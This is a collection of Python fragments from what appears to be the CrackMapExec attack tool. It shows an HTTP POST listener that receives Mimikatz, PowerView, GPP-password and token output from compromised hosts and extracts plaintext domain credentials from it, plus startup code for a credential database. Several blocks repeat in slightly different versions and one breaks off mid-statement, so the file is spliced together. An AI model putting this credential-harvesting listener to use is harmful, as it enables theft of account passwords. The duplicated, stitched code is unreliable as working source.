    def do_POST(self):
        """Handle a POST that reports command output back to the listener.

        Acknowledges the request with a 200, reads exactly Content-Length
        bytes of body, then dispatches on whichever ``settings.args`` mode
        is active: ``mimikatz`` (extract domain\\user:password triples and
        persist the raw output), ``mimikatz_cmd`` (log and persist the raw
        output), or ``powerview`` / ``gpp_passwords`` / ``tokens`` (log the
        output line by line).  Nothing beyond the status line is sent back.
        """
        # NOTE(review): the 200 is sent before the body is read or
        # validated, so a malformed request is still acknowledged as OK.
        self.send_response(200)
        self.end_headers()
        # Content-Length is client-controlled and used unchecked: a missing
        # header makes getheader() return None and int() raise, and there is
        # no upper bound on the value before rfile.read() allocates for it.
        length = int(self.headers.getheader('content-length'))
        data = self.rfile.read(length)

        # Per-request logger tagged with the reporting client's address so
        # every logged line can be attributed to its source host.
        cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
                                                           'port': self.client_address[1],
                                                           'service': 'PARSER',
                                                           'hostname': ''})

        if settings.args.mimikatz:
            try:
                buf = StringIO(data).readlines()
                plaintext_creds = []
                i = 0
                while i < len(buf):
                    # A 'Password' line whose value is not '(null)' is assumed
                    # to be preceded by the 'Domain' (i-1) and 'User' (i-2)
                    # lines.  For i < 2 those indices are negative and wrap
                    # to the END of buf without error; a line lacking ':'
                    # raises IndexError, caught by the broad except below.
                    if ('Password' in buf[i]) and ('(null)' not in buf[i]):
                        passw  = buf[i].split(':')[1].strip()
                        domain = buf[i-1].split(':')[1].strip()
                        user   = buf[i-2].split(':')[1].strip()
                        plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))

                    i += 1

                if plaintext_creds:
                    cme_logger.success('Found plain text credentials (domain\\user:password)')
                    for cred in plaintext_creds:
                        cme_logger.results(u'{}'.format(cred))
            except Exception as e:
                # Parsing is best-effort: the failure is logged and the raw
                # output is still saved below.
                cme_logger.error("Error while parsing Mimikatz output: {}".format(e))

            self.save_mimikatz_output(data, cme_logger)

        elif settings.args.mimikatz_cmd:
            cme_logger.success('Got Mimikatz command output')
            cme_logger.results(data)
            # NOTE(review): called with one argument here but with
            # (data, cme_logger) in the mimikatz branch above — confirm which
            # arity save_mimikatz_output actually accepts.
            self.save_mimikatz_output(data)

        # The remaining modes only run when the body is non-empty.
        elif settings.args.powerview and data:
            cme_logger.success('Got PowerView command output')
            buf = StringIO(data.strip()).readlines()
            for line in buf:
                cme_logger.results(line.strip())

        elif settings.args.gpp_passwords and data:
            cme_logger.success('Got Get-GPPPasswords output')
            buf = StringIO(data.strip()).readlines()
            for line in buf:
                cme_logger.results(line.strip())

        elif settings.args.tokens and data:
            # (typo in the user-facing string: 'avalible')
            cme_logger.success('Retrieved avalible tokens:')
            buf = StringIO(data.strip()).readlines()
            for line in buf:
                cme_logger.results(line.strip())
    def do_POST(self):
        """Handle a POST that reports command output back to the listener.

        Acknowledges the request with a 200, reads exactly Content-Length
        bytes of body, then dispatches on whichever ``settings.args`` mode
        is active: ``mimikatz`` (extract domain\\user:password triples and
        persist the raw output), ``mimikatz_cmd`` (log and persist the raw
        output), or ``powerview`` / ``gpp_passwords`` (log the output line
        by line).  Nothing beyond the status line is sent back.
        """
        # NOTE(review): the 200 is sent before the body is read or
        # validated, so a malformed request is still acknowledged as OK.
        self.send_response(200)
        self.end_headers()
        # Content-Length is client-controlled and used unchecked: a missing
        # header makes getheader() return None and int() raise, and there is
        # no upper bound on the value before rfile.read() allocates for it.
        length = int(self.headers.getheader('content-length'))
        data = self.rfile.read(length)

        # Per-request logger tagged with the reporting client's address so
        # every logged line can be attributed to its source host.
        cme_logger = CMEAdapter(logging.getLogger('CME'), {'host': self.client_address[0],
                                                           'port': self.client_address[1],
                                                           'service': 'PARSER',
                                                           'hostname': ''})

        if settings.args.mimikatz:
            try:
                buf = StringIO(data).readlines()
                plaintext_creds = []
                i = 0
                while i < len(buf):
                    # A 'Password' line whose value is not '(null)' is assumed
                    # to be preceded by the 'Domain' (i-1) and 'User' (i-2)
                    # lines.  For i < 2 those indices are negative and wrap
                    # to the END of buf without error; a line lacking ':'
                    # raises IndexError, caught by the broad except below.
                    if ('Password' in buf[i]) and ('(null)' not in buf[i]):
                        passw  = buf[i].split(':')[1].strip()
                        domain = buf[i-1].split(':')[1].strip()
                        user   = buf[i-2].split(':')[1].strip()
                        plaintext_creds.append('{}\\{}:{}'.format(domain, user, passw))

                    i += 1

                if plaintext_creds:
                    cme_logger.success('Found plain text credentials (domain\\user:password)')
                    for cred in plaintext_creds:
                        cme_logger.results(u'{}'.format(cred))
            except Exception as e:
                # Parsing is best-effort: the failure is logged and the raw
                # output is still saved below.
                cme_logger.error("Error while parsing Mimikatz output: {}".format(e))

            self.save_mimikatz_output(data, cme_logger)

        elif settings.args.mimikatz_cmd:
            cme_logger.success('Got Mimikatz command output')
            cme_logger.results(data)
            # NOTE(review): called with one argument here but with
            # (data, cme_logger) in the mimikatz branch above — confirm which
            # arity save_mimikatz_output actually accepts.
            self.save_mimikatz_output(data)

        # The remaining modes only run when the body is non-empty.
        elif settings.args.powerview and data:
            cme_logger.success('Got PowerView command output')
            buf = StringIO(data.strip()).readlines()
            for line in buf:
                cme_logger.results(line.strip())

        elif settings.args.gpp_passwords and data:
            cme_logger.success('Got Get-GPPPasswords output')
            buf = StringIO(data.strip()).readlines()
            for line in buf:
                cme_logger.results(line.strip())
# Script-level state shared with the rest of the file: the loaded module,
# the listening server, its context and the resolved target list.
module = server = context = None
targets = []
# Default port per server scheme.
server_port_dict = {'http': 80, 'https': 443}

args = parser.parse_args()

# --verbose switches the debug logger on before anything else logs.
if args.verbose:
    setup_debug_logger()

logger = CMEAdapter(setup_logger())

# The database must already exist (setup_database.py creates it).
# sqlite3.connect() would otherwise silently create an empty file, so stop
# here instead of continuing against an unusable database.
if not os.path.exists('data/cme.db'):
    logger.error(
        'Could not find CME database, did you run the setup_database.py script?'
    )
    sys.exit(1)

# Autocommit (isolation_level=None), plain str for TEXT columns, and a
# connection usable from other threads (check_same_thread=False — callers
# have to serialise their own access to it).
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.isolation_level = None
db_connection.text_factory = str
db = CMEDatabase(db_connection)
if args.cred_id:
    try:
        c_id, credtype, domain, username, password = db.get_credentials(
            filterTerm=args.cred_id)[0]
        args.username = [username]
# Default port per server scheme.
server_port_dict = {'http': 80, 'https': 443}

# Script-level state shared with the rest of the file: the loaded module,
# the listening server, its context and the resolved target list.
module = server = context = None
targets = []

args = parser.parse_args()

# --verbose switches the debug logger on before anything else logs.
if args.verbose:
    setup_debug_logger()

logger = CMEAdapter(setup_logger())

# The database must already exist (setup_database.py creates it).
# sqlite3.connect() would otherwise silently create an empty file, so stop
# here instead of continuing against an unusable database.
if not os.path.exists('data/cme.db'):
    logger.error('Could not find CME database, did you run the setup_database.py script?')
    sys.exit(1)

# Autocommit (isolation_level=None), plain str for TEXT columns, and a
# connection usable from other threads (check_same_thread=False — callers
# have to serialise their own access to it).
db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
db_connection.isolation_level = None
db_connection.text_factory = str
db = CMEDatabase(db_connection)
if args.cred_id:
    try:
        c_id, credtype, domain, username, password = db.get_credentials(filterTerm=args.cred_id)[0]
        args.username = [username]

        if not args.domain:
            args.domain = domain
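# Script-level state shared with the rest of the file: the loaded module,
# the listening server, its context and the resolved target list.
module  = None
server  = None
context = None
targets = []
# Default port per server scheme, used when --server-port is not given.
server_port_dict = {'http': 80, 'https': 443}

args = parser.parse_args()

# --verbose switches the debug logger on before anything else logs.
if args.verbose:
    setup_debug_logger()

logger = CMEAdapter(setup_logger())

# Running as root is required (presumably because the default listener
# ports above are privileged).  Compare with != rather than `is not`:
# identity comparison against an int literal only works because CPython
# caches small ints, and Python 3.8+ emits a SyntaxWarning for it.
if os.geteuid() != 0:
    logger.error("I'm sorry {}, I'm afraid I can't let you do that".format(getpass.getuser()))
    sys.exit(1)

# Fall back to the scheme's default port when none was given on the CLI.
# NOTE(review): an unexpected args.server value raises KeyError here —
# assumed to be constrained by argparse choices; confirm.
if not args.server_port:
    args.server_port = server_port_dict[args.server]

try:
    # Autocommit (isolation_level=None), plain str for TEXT columns, and a
    # connection usable from other threads (check_same_thread=False —
    # callers have to serialise their own access to it).
    # NOTE(review): there is no existence check, so a missing data/cme.db
    # is silently created empty rather than reported.
    db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
    db_connection.text_factory = str
    db_connection.isolation_level = None
    db = CMEDatabase(db_connection)
except Exception as e:
    # Startup boundary: any failure to open the database is fatal, so the
    # broad except is deliberate — log and exit.
    logger.error("Could not connect to CME database: {}".format(e))
    sys.exit(1)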
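# Script-level state shared with the rest of the file: the loaded module,
# the listening server, its context and the resolved target list.
module = None
server = None
context = None
targets = []
# Default port per server scheme, used when --server-port is not given.
server_port_dict = {'http': 80, 'https': 443}

args = parser.parse_args()

# --verbose switches the debug logger on before anything else logs.
if args.verbose:
    setup_debug_logger()

logger = CMEAdapter(setup_logger())

# Running as root is required (presumably because the default listener
# ports above are privileged).  Compare with != rather than `is not`:
# identity comparison against an int literal only works because CPython
# caches small ints, and Python 3.8+ emits a SyntaxWarning for it.
if os.geteuid() != 0:
    logger.error("I'm sorry {}, I'm afraid I can't let you do that".format(
        getpass.getuser()))
    sys.exit(1)

# Fall back to the scheme's default port when none was given on the CLI.
# NOTE(review): an unexpected args.server value raises KeyError here —
# assumed to be constrained by argparse choices; confirm.
if not args.server_port:
    args.server_port = server_port_dict[args.server]

try:
    # Autocommit (isolation_level=None), plain str for TEXT columns, and a
    # connection usable from other threads (check_same_thread=False —
    # callers have to serialise their own access to it).
    # NOTE(review): there is no existence check, so a missing data/cme.db
    # is silently created empty rather than reported.
    db_connection = sqlite3.connect('data/cme.db', check_same_thread=False)
    db_connection.text_factory = str
    db_connection.isolation_level = None
    db = CMEDatabase(db_connection)
except Exception as e:
    # Startup boundary: any failure to open the database is fatal, so the
    # broad except is deliberate — log and exit.
    logger.error("Could not connect to CME database: {}".format(e))
    sys.exit(1)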